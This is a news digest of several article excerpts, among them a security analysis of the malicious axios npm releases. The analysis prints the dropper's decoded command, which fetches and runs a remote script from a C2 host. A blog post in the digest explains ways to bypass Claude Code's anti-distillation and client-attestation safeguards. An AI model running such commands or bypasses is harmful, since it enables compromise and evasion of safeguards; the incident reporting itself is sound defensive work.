10 interesting stories served every morning and every evening.
Every time any of LinkedIn’s one billion users visits linkedin.com, hidden code searches their computer for installed software, collects the results, and transmits them to LinkedIn’s servers and to third-party companies including an American-Israeli cybersecurity firm.
The user is never asked. Never told. LinkedIn’s privacy policy does not mention it.
Because LinkedIn knows each user’s real name, employer, and job title, it is not searching anonymous visitors. It is searching identified people at identified companies. Millions of companies. Every day. All over the world.
Fairlinked e. V. is an association of commercial LinkedIn users. We represent the professionals who use LinkedIn, the businesses that invest in and depend on the platform, and the toolmakers who build products for it.
BrowserGate is our investigation and campaign to document one of the largest corporate espionage and data breach scandals in digital history, to inform the public and regulators, to collect evidence, and to raise funds for the legal proceedings required to stop it.
LinkedIn’s scan reveals the religious beliefs, political opinions, disabilities, and job search activity of identified individuals. LinkedIn scans for extensions that identify practicing Muslims, extensions that reveal political orientation, extensions built for neurodivergent users, and 509 job search tools that expose who is secretly looking for work on the very platform where their current employer can see their profile.
Under EU law, this category of data is not regulated. It is prohibited. LinkedIn has no consent, no disclosure, and no legal basis. Its privacy policy does not mention any of this.
LinkedIn scans for over 200 products that directly compete with its own sales tools, including Apollo, Lusha, and ZoomInfo. Because LinkedIn knows each user’s employer, it can map which companies use which competitor products. It is extracting the customer lists of thousands of software companies from their users’ browsers without anyone’s knowledge.
Then it uses what it finds. LinkedIn has already sent enforcement threats to users of third-party tools, using data obtained through this covert scanning to identify its targets.
In 2023, the EU designated LinkedIn as a regulated gatekeeper under the Digital Markets Act and ordered it to open its platform to third-party tools. LinkedIn’s response:
It published two restricted APIs and presented them to the European Commission as compliance. Together, these APIs handle approximately 0.07 calls per second. Meanwhile, LinkedIn already operates an internal API called Voyager that powers every LinkedIn web and mobile product at 163,000 calls per second. In Microsoft’s 249-page compliance report to the EU, the word “API” appears 533 times. “Voyager” appears zero times.
At the same time, LinkedIn expanded its surveillance of the exact tools the regulation was designed to protect. The scan list grew from roughly 461 products in 2024 to over 6,000 by February 2026. The EU told LinkedIn to let third-party tools in. LinkedIn built a surveillance system to find and punish every user of those tools.
LinkedIn loads an invisible tracking element from HUMAN Security (formerly PerimeterX), an American-Israeli cybersecurity firm, zero pixels wide, hidden off-screen, that sets cookies on your browser without your knowledge. A separate fingerprinting script runs from LinkedIn’s own servers. A third script from Google executes silently on every page load. All of it encrypted. None of it disclosed.
Microsoft has 33,000 employees and a $15 billion legal budget. We have the evidence. What we need is people and funding to hold them accountable.
...
Read the original on browsergate.eu »
Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross-platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity hosted a community town hall on this incident on April 1st at 10:00 AM PT — YouTube recording: https://youtu.be/3Hku_svFvos

axios is the most popular JavaScript HTTP client library, with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of the widely used axios HTTP client library published to npm: axios@1.14.1 and axios@0.30.4. The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross-platform remote access trojan (RAT) dropper, targeting macOS, Windows, and Linux. The dropper contacts a live command-and-control server and delivers platform-specific second-stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection.

If you have installed axios@1.14.1 or axios@0.30.4, assume your system is compromised.

There are zero lines of malicious code inside axios itself, and that's exactly what makes this attack so dangerous. Both poisoned releases inject a fake dependency, plain-crypto-js@4.2.1, a package never imported anywhere in the axios source, whose sole purpose is to run a postinstall script that deploys a cross-platform remote access trojan. The dropper contacts a live command-and-control server, delivers separate second-stage payloads for macOS, Windows, and Linux, then erases itself and replaces its own package.json with a clean decoy. A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.

This was not opportunistic. It was precision.
The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker's server, before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.

These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.

StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker's C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events
[Community Webinar] axios Compromised on npm: What We Know, What You Should Do
Watch the StepSecurity community briefing on the axios supply chain attack. We walk through the full attack chain, indicators of compromise, remediation steps, and answer community questions.
Watch the recording on YouTube →
The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:
plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection.
plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The postinstall: “node setup.js” hook and obfuscated dropper are introduced.
axios@1.14.1 published by compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.
axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.
npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. Timestamp is inferred from the axios registry document’s modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API.
npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.
npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
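All of the publisher fields in this timeline come from npm's public registry documents, so the basic forensic check is scriptable. A minimal sketch (manual_publishes is an illustrative helper, not StepSecurity tooling; field names follow the metadata excerpts shown later in this write-up):

```python
def manual_publishes(registry_doc: dict) -> list[str]:
    """Given a parsed npm registry document (https://registry.npmjs.org/<pkg>),
    return versions whose publish metadata lacks the OIDC trustedPublisher
    binding. Illustrative sketch only."""
    flagged = []
    for version, meta in registry_doc.get("versions", {}).items():
        npm_user = meta.get("_npmUser", {})
        if "trustedPublisher" not in npm_user:
            flagged.append(version)
    return flagged
```

On a package where every legitimate release is published through GitHub Actions, any version this returns deserves a close look.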
The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account's registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed.

Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project's normal GitHub Actions CI/CD pipeline.

A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm's OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token with no OIDC binding and no gitHead:

// axios@1.14.0 — LEGITIMATE
"_npmUser": {
  "name": "GitHub Actions",
  "email": "npm-oidc-no-reply@github.com",
  "trustedPublisher": {
    "id": "github",
    "oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"
  }
}

// axios@1.14.1 — MALICIOUS
"_npmUser": {
  "name": "jasonsaayman",
  "email": "ifstap@proton.me"
}
// no trustedPublisher, no gitHead, no corresponding GitHub commit or tag

There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.

Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from account nrwise@proton.me. This package:

Masquerades as crypto-js, with an identical description and a repository URL pointing to the legitimate brix/crypto-js GitHub repository

Contains "postinstall": "node setup.js" — the hook that fires the RAT dropper on install

Pre-stages a clean package.json stub in a file named package.md for evidence destruction after execution

The decoy version (4.2.0) was published 18 hours earlier to establish publishing history - a clean package in the registry that makes nrwise look like a legitimate maintainer.

What changed between 4.2.0 (decoy) and 4.2.1 (malicious)

A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences: the postinstall hook added to package.json, the new setup.js dropper, and the new package.md stub. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions.
The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.

The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:

// Contents of package.md (the clean replacement stub)
{
"name": "plain-crypto-js",
"version": "4.2.0", // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
"description": "JavaScript library of crypto standards.",
"license": "MIT",
"author": { "name": "Evan Vosberg", "url": "http://github.com/evanvosberg" },
"homepage": "http://github.com/brix/crypto-js",
"repository": { "type": "git", "url": "http://github.com/brix/crypto-js.git" },
"main": "index.js",
// No "scripts" key — no postinstall, no test
"dependencies": {}
}

This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.

# What npm list reports POST-infection (after the package.json swap):
$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0 # ← reports 4.2.0, not 4.2.1
# but the dropper already ran as 4.2.1
# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js cipher-core.js core.js …
# If this directory exists at all, the dropper ran.
# plain-crypto-js is not a dependency of ANY legitimate axios version.

The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:

// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)
{
"name": "crypto-js",
"version": "4.2.0",
"description": "JavaScript library of crypto standards.",
"author": "Evan Vosberg",
"homepage": "http://github.com/brix/crypto-js",
"scripts": {
"test": "grunt" // ← no postinstall
}
}

// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
{
"name": "plain-crypto-js", // ← different name, everything else cloned
"version": "4.2.1", // ← version one ahead of the real package
"description": "JavaScript library of crypto standards.",
"author": { "name": "Evan Vosberg" }, // ← fraudulent use of real author name
"homepage": "http://github.com/brix/crypto-js", // ← real repo, wrong package
"scripts": {
"test": "grunt",
"postinstall": "node setup.js" // ← THE ONLY DIFFERENCE. The entire weapon.
}
}

The attacker published axios@1.14.1 and axios@0.30.4 with "plain-crypto-js": "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.

When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js's postinstall script, launching the dropper.

Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()'d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.

The Surgical Precision of the Injection

A complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.

# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)
DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)

# --- axios/package.json (1.14.0)
# +++ axios/package.json (1.14.1)
- "version": "1.14.0",
+ "version": "1.14.1",
"scripts": {
"fix": "eslint --fix lib/**/*.js",
- "prepare": "husky"
"dependencies": {
"follow-redirects": "^2.1.0",
"form-data": "^4.0.1",
"proxy-from-env": "^2.1.0",
+ "plain-crypto-js": "^4.2.1"
}

Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the "prepare": "husky" script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project's standard release tooling, which would have re-added the husky prepare script.

The same analysis applies to axios@0.30.3 → axios@0.30.4:

# --- axios/package.json (0.30.3)
# +++ axios/package.json (0.30.4)
- "version": "0.30.3",
+ "version": "0.30.4",
"dependencies": {
"follow-redirects": "^1.15.4",
"form-data": "^4.0.4",
"proxy-from-env": "^1.1.0",
+ "plain-crypto-js": "^4.2.1"
}

Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.

setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers.

All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:

_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript's Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as: charCode XOR key[(7 × r × r) % 10] XOR 333

_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.

The dropper's entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033

StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:

stq[0] → "child_process" // shell execution
stq[1] → "os" // platform detection
stq[2] → "fs" // filesystem operations
stq[3] → "http://sfrclak.com:8000/" // C2 base URL
stq[5] → "win32" // Windows platform identifier
stq[6] → "darwin" // macOS platform identifier
stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
stq[13] → "package.json" // deleted after execution
stq[14] → "package.md" // clean stub renamed to package.json
stq[15] → ".exe"
stq[16] → ".ps1"
stq[17] → ".vbs"

The complete attack path from npm install to C2 contact and cleanup, across all three target platforms.

With all strings decoded, the dropper's full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.

// setup.js — de-obfuscated and annotated
// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
...
Read the original on www.stepsecurity.io »
Our most intelligent open models, built from Gemini 3 research and technology to maximize intelligence-per-parameter
Build autonomous agents that plan, navigate apps, and complete tasks on your behalf, with native support for function calling.

Develop applications with strong audio and visual understanding, for rich multimodal support.

Create multilingual experiences that go beyond translation and understand cultural context.

Improve performance for specific tasks by training Gemma using your preferred frameworks and techniques.

Run models on your own hardware for efficient development and deployment.
A new level of intelligence for mobile and IoT devices

Audio and vision support for real-time edge processing. They can run completely offline with near-zero latency on edge devices like phones, Raspberry Pi, and Jetson Nano.
Advanced reasoning for IDEs, coding assistants, and agentic workflows. These models are optimized for consumer GPUs — giving students, researchers, and developers the ability to turn workstations into local-first AI servers.
Gemma 4 models undergo the same rigorous infrastructure security protocols as our proprietary models. By choosing Gemma 4, enterprises and sovereign organizations gain a trusted, transparent foundation that delivers state-of-the-art capabilities while meeting the highest standards for security and reliability.
...
Read the original on deepmind.google »
After a team member summoned Copilot to correct a typo in a PR of mine, Copilot edited my PR description to include an ad for itself and Raycast.
This is horrific. I knew this kind of bullshit would happen eventually, but I didn’t expect it so soon.
Here is how platforms die: first, they are good to their users; then they abuse their users to make things better for their business customers; finally, they abuse those business customers to claw back all the value for themselves. Then, they die.
...
Read the original on notes.zachmanson.com »
Update: see HN discussions about this post: https://news.ycombinator.com/item?id=47586778
I use Claude Code daily, so when Chaofan Shou noticed earlier today that Anthropic had shipped a .map file alongside their Claude Code npm package, one containing the full, readable source code of the CLI tool, I immediately wanted to look inside. The package has since been pulled, but not before the code was widely mirrored (including by me) and picked apart on Hacker News.
This is Anthropic’s second accidental exposure in a week (the model spec leak was just days ago), and some people on Twitter are starting to wonder if someone inside is doing this on purpose. Probably not, but it’s a bad look either way. The timing is hard to ignore: just ten days ago, Anthropic sent legal threats to OpenCode, forcing them to remove built-in Claude authentication because third-party tools were using Claude Code’s internal APIs to access Opus at subscription rates instead of pay-per-token pricing. That whole saga makes some of the findings below more pointed.
So I spent my morning reading through the HN comments and leaked source. Here’s what I found, roughly ordered by how “spicy” I thought it was.
In claude.ts (line 301-313), there’s a flag called ANTI_DISTILLATION_CC. When enabled, Claude Code sends anti_distillation: [‘fake_tools’] in its API requests. This tells the server to silently inject decoy tool definitions into the system prompt.
The idea: if someone is recording Claude Code’s API traffic to train a competing model, the fake tools pollute that training data. It’s gated behind a GrowthBook feature flag (tengu_anti_distill_fake_tool_injection) and only active for first-party CLI sessions.
This was one of the first things people noticed on HN.
There’s also a second anti-distillation mechanism in betas.ts (lines 279-298), server-side connector-text summarization. When enabled, the API buffers the assistant’s text between tool calls, summarizes it, and returns the summary with a cryptographic signature. On subsequent turns, the original text can be restored from the signature. If you’re recording API traffic, you only get the summaries, not the full reasoning chain.
How hard would it be to work around these? Not very. Looking at the activation logic in claude.ts, the fake tools injection requires all four conditions to be true: the ANTI_DISTILLATION_CC compile-time flag, the cli entrypoint, a first-party API provider, and the tengu_anti_distill_fake_tool_injection GrowthBook flag returning true. A MITM proxy that strips the anti_distillation field from request bodies before they reach the API would bypass it entirely, since the injection is server-side and opt-in. The shouldIncludeFirstPartyOnlyBetas() function also checks for CLAUDE_CODE_DISABLE_EXPERIMENTAL_BETAS, so setting that env var to a truthy value disables the whole thing. And if you’re using a third-party API provider or the SDK entrypoint instead of the CLI, the check never fires at all. The connector-text summarization is even more narrowly scoped, Anthropic-internal-only (USER_TYPE === ‘ant’), so external users won’t encounter it regardless.
Anyone serious about distilling from Claude Code traffic would find the workarounds in about an hour of reading the source. The real protection is probably legal, not technical.
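The bypass described above — stripping the opt-in field before the request leaves the machine — reduces to a one-line JSON edit. A minimal sketch (the field name comes from the leaked source; the surrounding request shape is assumed):

```python
import json

def strip_anti_distillation(raw_body: str) -> str:
    """Drop the opt-in anti_distillation field from an outbound request
    body, as a MITM proxy could. Sketch only: the field name is from the
    leaked source; everything else here is illustrative."""
    body = json.loads(raw_body)
    body.pop("anti_distillation", None)
    return json.dumps(body)
```

Since the decoy-tool injection is server-side and only happens when the client asks for it, a request without the field gets no fake tools.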
The file undercover.ts (about 90 lines) implements a mode that strips all traces of Anthropic internals when Claude Code is used in non-internal repos. It instructs the model to never mention internal codenames like “Capybara” or “Tengu,” internal Slack channels, repo names, or the phrase “Claude Code” itself.
“There is NO force-OFF. This guards against model codename leaks.”
You can force it ON with CLAUDE_CODE_UNDERCOVER=1, but there’s no way to force it off. In external builds, the entire function gets dead-code-eliminated to trivial returns. This is a one-way door.
This means AI-authored commits and PRs from Anthropic employees in open source projects will have no indication that an AI wrote them. Hiding internal codenames is reasonable. Having the AI actively pretend to be human is a different thing.
An LLM company using regexes for sentiment analysis is peak irony, but also: a regex is faster and cheaper than an LLM inference call just to check if someone is swearing at your tool.
In system.ts (lines 59-95), API requests include a cch=00000 placeholder. Before the request leaves the process, Bun’s native HTTP stack (written in Zig) overwrites those five zeros with a computed hash. The server then validates the hash to confirm the request came from a real Claude Code binary, not a spoofed one.
They use a placeholder of the same length so the replacement doesn’t change the Content-Length header or require buffer reallocation. The computation happens below the JavaScript runtime, so it’s invisible to anything running in the JS layer. It’s basically DRM for API calls, implemented at the HTTP transport level.
This is the technical enforcement behind the OpenCode legal fight. Anthropic doesn’t just ask third-party tools not to use their APIs; the binary itself cryptographically proves it’s the real Claude Code client. If you’re wondering why the OpenCode community had to resort to session-stitching hacks and auth plugins after Anthropic’s legal notice, this is why.
The attestation isn’t airtight, though. The whole mechanism is gated behind a compile-time feature flag (NATIVE_CLIENT_ATTESTATION), and the cch=00000 placeholder only gets injected into the x-anthropic-billing-header when that flag is on. The header itself can be disabled entirely by setting CLAUDE_CODE_ATTRIBUTION_HEADER to a falsy value, or remotely via a GrowthBook killswitch (tengu_attribution_header). The Zig-level hash replacement also only works inside the official Bun binary. If you rebuilt the JS bundle and ran it on stock Bun (or Node), the placeholder would survive as-is: five literal zeros hitting the server. Whether the server rejects that outright or just logs it is an open question, but the code comment references a server-side _parse_cc_header function that “tolerates unknown extra fields,” which suggests the validation might be more forgiving than you’d expect for a DRM-like system. Not a push-button bypass, but not the kind of thing that would stop a determined third-party client for long either.
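The same-length placeholder trick is worth seeing concretely. The sketch below shows why overwriting five zeros in place leaves Content-Length untouched; the actual hash computed by the Zig layer is unknown, so a SHA-256 prefix stands in for it:

```python
import hashlib

PLACEHOLDER = b"cch=00000"

def stamp_request(body: bytes, secret: bytes) -> bytes:
    """Replace the 5-zero placeholder with a 5-char stamp of identical
    length. The real hash scheme is not public; SHA-256 here is purely
    illustrative."""
    digest = hashlib.sha256(secret + body).hexdigest()[:5].encode()
    stamped = body.replace(PLACEHOLDER, b"cch=" + digest, 1)
    assert len(stamped) == len(body)  # Content-Length stays valid
    return stamped
```

Because the stamped body is byte-for-byte the same length, no header needs to be rewritten and no buffer reallocated — the substitution can happen at the last moment, below the JS runtime.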
“BQ 2026-03-10: 1,279 sessions had 50+ consecutive failures (up to 3,272) in a single session, wasting ~250K API calls/day globally.”
The fix? MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3. After 3 consecutive failures, compaction is disabled for the rest of the session. Three lines of code to stop burning a quarter million API calls a day.
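The fix is effectively a consecutive-failure latch. A sketch of the described behavior (the constant name mirrors the one quoted above; the surrounding session logic is assumed):

```python
MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3

class AutocompactGate:
    """Once failures hit the cap, compaction stays off for the session."""
    def __init__(self) -> None:
        self.consecutive_failures = 0
        self.disabled = False

    def record(self, success: bool) -> None:
        if success:
            self.consecutive_failures = 0
        elif not self.disabled:
            self.consecutive_failures += 1
            if self.consecutive_failures >= MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES:
                self.disabled = True

    def should_compact(self) -> bool:
        return not self.disabled
```

A single success resets the counter, so only a genuine run of consecutive failures trips the latch.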
Throughout the codebase, there are references to a feature-gated mode called KAIROS. Based on the code paths in main.tsx, it looks like an unreleased autonomous agent mode.
This is probably the biggest product roadmap reveal from the leak.
The implementation is heavily gated, so who knows how far along it is. But the scaffolding for an always-on, background-running agent is there.
Tomorrow is April 1st, and the source contains what’s almost certainly this year’s April Fools’ joke: buddy/companion.ts implements a Tamagotchi-style companion system. Every user gets a deterministic creature (18 species, rarity tiers from common to legendary, 1% shiny chance, RPG stats like DEBUGGING and SNARK) generated from their user ID via a Mulberry32 PRNG. Species names are encoded with String.fromCharCode() to dodge build-system grep checks.
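Mulberry32 is a well-known 32-bit PRNG, which makes the "deterministic creature" design easy to picture: the same user ID always yields the same stream, hence the same species and stats. Below is a Python port of the standard Mulberry32 algorithm; the species list and stat names are invented for illustration, not taken from the leak:

```python
def mulberry32(seed: int):
    """Standard Mulberry32 PRNG; returns floats in [0, 1)."""
    state = seed & 0xFFFFFFFF
    def rand() -> float:
        nonlocal state
        state = (state + 0x6D2B79F5) & 0xFFFFFFFF
        t = state
        t = ((t ^ (t >> 15)) * (t | 1)) & 0xFFFFFFFF
        t = (t ^ (t + ((t ^ (t >> 7)) * (t | 61)))) & 0xFFFFFFFF
        return ((t ^ (t >> 14)) & 0xFFFFFFFF) / 2**32
    return rand

def creature_for(user_id: int) -> dict:
    # Illustrative only — these species/stat names are NOT from the leak.
    species = ["byteling", "lintcat", "segfault-sprite"]  # real list has 18
    rng = mulberry32(user_id)
    return {
        "species": species[int(rng() * len(species))],
        "shiny": rng() < 0.01,          # 1% shiny chance
        "DEBUGGING": int(rng() * 100),
    }
```

No per-user state needs to be stored server-side: the user ID is the seed, and everything else falls out deterministically.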
The terminal rendering in ink/screen.ts and ink/optimizer.ts borrows game-engine techniques: an Int32Array-backed ASCII char pool, bitmask-encoded style metadata, a patch optimizer that merges cursor moves and cancels hide/show pairs, and a self-evicting line-width cache (the source claims “~50x reduction in stringWidth calls during token streaming”). Seems like overkill until you remember these things stream tokens one at a time.
Every bash command runs through 23 numbered security checks in bashSecurity.ts: 18 blocked Zsh builtins, defense against Zsh equals expansion (=curl bypassing permission checks for curl), unicode zero-width space injection, IFS null-byte injection, and a malformed token bypass found during HackerOne review. I haven’t seen another tool with this specific a Zsh threat model.
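A couple of the listed vectors are easy to illustrate. The checks below are reconstructions in the spirit of the described rules, not the actual bashSecurity.ts code:

```python
import re

# In zsh, `=curl` expands to curl's full path, dodging name-based allowlists.
ZSH_EQUALS = re.compile(r"(^|\s)=\w")
# Zero-width characters can hide inside an otherwise-allowed command name.
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\u2060]")

def flag_command(cmd: str) -> list[str]:
    """Return the (illustrative) rule names a shell command trips."""
    flags = []
    if ZSH_EQUALS.search(cmd):
        flags.append("zsh-equals-expansion")
    if ZERO_WIDTH.search(cmd):
        flags.append("zero-width-injection")
    if "\x00" in cmd:
        flags.append("null-byte-injection")
    return flags
```

The point of checks like these is that the dangerous command never looks dangerous as plain text — the expansion or invisible character does the work at execution time.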
Prompt cache economics clearly drive a lot of the architecture. promptCacheBreakDetection.ts tracks 14 cache-break vectors, and there are “sticky latches” that prevent mode toggles from busting the cache. One function is annotated DANGEROUS_uncachedSystemPromptSection(). When you’re paying for every token, cache invalidation stops being a computer science joke and becomes an accounting problem.
The multi-agent coordinator in coordinatorMode.ts is interesting because the orchestration algorithm is a prompt, not code. It manages worker agents through system prompt instructions like “Do not rubber-stamp weak work” and “You must understand findings before directing follow-up work. Never hand off understanding to another worker.”
The codebase also has some rough spots. print.ts is 5,594 lines long with a single function spanning 3,167 lines and 12 levels of nesting. They use Axios for HTTP, which is funny timing given that Axios was just compromised on npm with malicious versions dropping a remote access trojan.
Some people are downplaying this because Google’s Gemini CLI and OpenAI’s Codex are already open source. But those companies open-sourced their agent SDK (a toolkit), not the full internal wiring of their flagship product.
The real damage isn’t the code. It’s the feature flags. KAIROS, the anti-distillation mechanisms: these are product roadmap details that competitors can now see and react to. The code can be refactored. The strategic surprise can’t be un-leaked.
And here’s the kicker: Anthropic acquired Bun at the end of last year, and Claude Code is built on top of it. A Bun bug (oven-sh/bun#28001), filed on March 11, reports that source maps are served in production mode even though Bun’s own docs say they should be disabled. The issue is still open. If that’s what caused the leak, then Anthropic’s own toolchain shipped a known bug that exposed their own product’s source code.
As one Twitter reply put it: “accidentally shipping your source map to npm is the kind of mistake that sounds impossible until you remember that a significant portion of the codebase was probably written by the AI you are shipping.”
...
Read the original on alex000kim.com »
I’ve taken agency in the treatment of my bone cancer (osteosarcoma in the T5 vertebra of the upper spine). After I ran out of standard-of-care treatment options and no trials were available to me, I started pursuing maximum diagnostics, creating new treatments, running treatments in parallel, and scaling this approach for others.
Elliot Hershberg wrote a great and extensive article about my cancer journey.
My cancer journey deck is embedded below, and there is also a recording of an OpenAI Forum presentation. The companies we are building to scale this approach for others can be found at evenone.ventures. Please scroll further on this page for my data and other information.
I think the medical industry can be more patient-first; see this great article by Ruxandra: https://www.writingruxandrabio.com/p/the-bureaucracy-blocking-the-chance
For my data, please see https://osteosarc.com/, which includes my treatment timeline and a data overview doc with 25TB of publicly readable Google Cloud buckets.
Please subscribe to my mailing list
...
Read the original on sytse.com »
This is the first of a series of articles in which you will learn about what may be one of the silliest, most preventable, and most costly mishaps of the 21st century, where Microsoft all but lost OpenAI, its largest customer, and the trust of the US government.
I joined Azure Core on the dull Monday morning of May 1st, 2023, as a senior member of the Overlake R&D team, the folks behind the Azure Boost offload card and network accelerator.
I wasn’t new to Azure, having run what is likely the longest-running production subscription of this cloud service, which launched in February 2010 as Windows Azure.
I wasn’t new to Microsoft either. I had been part of the Windows team since 1/1/2013, later helped migrate SharePoint Online to Azure, and then joined the Core OS team as a kernel engineer. There I helped improve the kernel and helped invent and deliver the Container platform that supports Docker, Azure Kubernetes, Azure Container Instances, Azure App Services, and Windows Sandbox, all shipping technologies that resulted in multiple granted patents.
Furthermore, I contributed to brainstorming the early Overlake cards in 2020-2021, drafting a proposal for a Host OS Accelerator Card communication protocol and network stack, when all we had was a debugger’s serial connection. I also served as a Core OS specialist, helping Azure Core engineers diagnose deep OS issues.
I rejoined in 2023 as an Azure expert on day one, having contributed to the development of some of the technologies on which Azure relies and having used the platform for more than a decade, both outside and inside Microsoft at a global scale.
